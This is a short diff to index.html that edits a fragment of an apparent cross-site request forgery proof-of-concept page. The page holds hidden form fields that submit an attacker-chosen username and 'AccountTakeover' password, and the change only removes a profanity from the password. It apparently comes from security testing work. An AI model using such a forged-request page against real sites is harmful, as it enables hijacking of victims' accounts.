--- a/index.html
+++ b/index.html
@@ -18,8 +18,8 @@
       <input type="hidden" name="emailStatus" value="" />
       <input type="hidden" name="rowCount" value="0" />
       <input type="hidden" name="Username" value="testervivek73&#43;hackerman&#64;gmail&#46;com" />
-      <input type="hidden" name="Password" value="FuckAccountTakeover&#64;1" />
-      <input type="hidden" name="confirmPassword" value="FuckAccountTakeover&#64;1" />
+      <input type="hidden" name="Password" value="AccountTakeover&#64;1" />
+      <input type="hidden" name="confirmPassword" value="AccountTakeover&#64;1" />
       <input type="submit" value="Submit request" />
     </form>
     <script>
